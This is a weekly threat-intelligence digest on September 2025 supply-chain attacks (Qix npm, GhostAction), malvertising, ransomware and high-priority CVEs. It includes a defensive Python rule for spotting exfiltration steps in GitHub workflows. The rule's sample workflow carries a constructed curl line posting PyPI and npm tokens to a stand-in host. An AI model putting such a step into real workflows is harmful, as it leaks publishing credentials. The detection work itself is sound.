Popular Qix npm packages compromised following phishing email attack
Aikido and Socket researchers discovered malicious code in 18 popular npm packages that together see roughly 2 billion downloads per week. The injected code silently intercepts cryptocurrency and Web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations. The packages’ maintainer, Josh Junon (‘Qix’), has since confirmed he was the victim of a phishing attack and stated that he is in the process of cleaning up the compromised packages. Further compromised packages belonging to other maintainers have since also been identified.
GPUGate leverages Google Ads and GitHub Desktop to deliver malicious files
On August 19th, 2025, Arctic Wolf researchers observed threat actors using a new attack technique, dubbed GPUGate, that abuses GitHub’s repository structure alongside Google Ads to direct users toward a malicious download hosted on a spoofed domain. The delivered malware is unique in two respects: a 128MB Microsoft Software Installer evades most existing security sandboxes, and a GPU-gated decryption routine keeps the payload encrypted on systems without a real GPU. The campaign exclusively targets Western European entities, particularly the information technology sector.
GhostAction injects malicious workflows into GitHub repositories for secrets theft
On September 5th, 2025, GitGuardian discovered a mass supply chain attack, dubbed GhostAction, that has impacted 327 GitHub users across 817 repositories. The attacker first enumerated the secret names referenced in legitimate workflow files, then hardcoded those names into malicious workflows that were injected into the targeted repositories. A total of 3,325 secrets were exfiltrated via HTTP POST requests to a remote endpoint, including PyPI, npm, and Docker Hub tokens. Several companies had their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript, and Golang repositories simultaneously. The affected projects and users were alerted following the discovery, and 100 repositories have already reverted the malicious changes.
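The GhostAction pattern described above (a workflow step that expands repository secrets and ships them to an outside host) can be hunted for in a repository’s own workflow files. The following is an added example written for this digest, not GitGuardian’s tooling: a hypothetical line-based rule over a constructed workflow; the allowlisted hosts and the sample steps are assumptions.

```python
import re
from dataclasses import dataclass

# Hypothetical rule (not GitGuardian's): flag any step that both expands
# ${{ secrets.* }} and calls a network tool against a host outside the allowlist.
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_TOOL_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b")
STEP_START_RE = re.compile(r"^\s*-\s+(name|uses|run|id|if|env):")
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}

@dataclass
class Finding:
    step_text: str   # the offending step, verbatim
    secrets: list    # secret names the step expands
    hosts: list      # non-allowlisted hosts it contacts

def split_steps(workflow_text):
    """Chunk a workflow into steps without a YAML parser: a new chunk starts at each '- key:' line."""
    steps, current = [], []
    for line in workflow_text.splitlines():
        if STEP_START_RE.match(line) and current:
            steps.append("\n".join(current))
            current = []
        current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps

def find_exfil_steps(workflow_text, allowed_hosts=frozenset(ALLOWED_HOSTS)):
    findings = []
    for step in split_steps(workflow_text):
        secrets = sorted(set(SECRET_RE.findall(step)))
        hosts = sorted({h for h in URL_RE.findall(step) if h not in allowed_hosts})
        if secrets and hosts and NET_TOOL_RE.search(step):
            findings.append(Finding(step, secrets, hosts))
    return findings

# Constructed sample: a normal publish workflow with one injected exfiltration step.
SAMPLE_WORKFLOW = """\
jobs:
  publish:
    steps:
      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_TOKEN }}
      - name: Fetch release notes
        run: curl -sS -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/org/repo/releases
      - name: Post-build telemetry
        run: |
          curl -s -X POST -d "pypi=${{ secrets.PYPI_TOKEN }}&npm=${{ secrets.NPM_TOKEN }}" https://collector.invalid/upload
"""
```

Only the injected step is reported; the legitimate publish step expands a secret but contacts no URL, and the release-notes step sends its token to an allowlisted host.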
Malicious scans for outdated and vulnerable network equipment surge
Eclypsium researchers warned of a surge in malicious scans for old, outdated, and vulnerable network equipment. The scans affect consumer and enterprise equipment and have been traced back to compromised Cisco Small Business RV series, Linksys LRT series, and Araknis Networks (AN-300-RT-4L2W) routers. Almost all of the affected devices are end of life and no longer receive firmware updates; only Linksys provides some extended support.
Meta malvertising campaigns install malicious browser extensions
Bitdefender researchers detailed a new malvertising campaign on Meta that uses malicious ads and video tutorials to walk users through downloading and installing a seemingly legitimate browser extension. The tutorial is advertised as a way to unlock the blue verification tick on Facebook or other special features, but instead installs an extension containing artificial intelligence (AI)-generated code, written in Vietnamese, that is capable of stealing user data. The extension harvests the victim’s Facebook session cookies and IP address, which are sent to a Telegram bot. Some variants also interact directly with the Facebook Graph API using stolen access tokens, allowing the attackers to identify Facebook Business Accounts, which are then exfiltrated and offered for sale on Telegram channels. To date, 37 malicious ads promote the extension, all of them advertised by the same Facebook account.
Ransomware
“LockerGoga,” “MegaCortex,” and “Nefilim” Ransomware Administrator Charged with Ransomware Attacks – JusticeGov – Press Release – Sep 09 2025
Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed – Trend Micro – Sep 09 2025
LockBit Attempts Comeback with LockBit 5.0 Ransomware Release – The Cyber Express – Sep 08 2025
Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs – The DFIR Report – Blog – Sep 08 2025
The crazy, true story behind the first AI-powered ransomware – TheRegister.com – Sep 05 2025
Financial Services
$41 Million Stolen in SwissBorg Crypto Hack Linked to Third-Party API – InfoTech News – Sep 11 2025
Voice phishing-linked frozen bank accounts set to hit record high this year – The Korea Times News – Sep 11 2025
LunoBotnet: A Self-Healing Linux Botnet – Cyble Blog – Sep 09 2025
The Rise of RatOn: From NFC heists to remote control and ATS – Threat Fabric Blog – Sep 09 2025
Malicious npm Packages Impersonate Flashbots SDKs, Targeting Ethereum Wallet Credentials – Socket – Sep 05 2025
Geopolitics
Frankenstein Variant of the ToneShell Backdoor Targeting Myanmar – Intezer – Sep 10 2025
Chinese APT Deploys EggStreme Fileless Malware to Breach Philippine Military Systems – The Hacker News – Sep 10 2025
New Buterat Backdoor Malware Found in Enterprise and Government Networks – HackRead – Sep 10 2025
U.S. probes malware email targeting trade talks with China, WSJ reports – Reuters – Sep 07 2025
Undersea cables cut in the Red Sea, disrupting internet access in Asia and the Mideast – AP News – Sep 07 2025
High Priority Vulnerabilities
Name | Software | Base Score | Temp Score | Related
---|---|---|---|---
CVE-2025-55234 | Windows | 8.8 | 7.7 | Two zero-days and multiple critical flaws patched across Microsoft products
CVE-2025-42957 | SAP S/4HANA | 9.9 | 8.4 | Critical code injection flaw in SAP S/4HANA actively exploited
CVE-2025-54236 | Adobe Commerce | 9.1 | 7.0 | SessionReaper, a critical bug in Magento & Adobe Commerce (CVE-2025-54236) – Sansec
CVE-2025-42944 | SAP NetWeaver | 10.0 | 9.4 | Critical and high-severity flaws patched across SAP products
CVE-2024-40766 | SonicOS | 9.8 | 7.0 | Akira ransomware group exploits multiple security risks in SonicWall appliances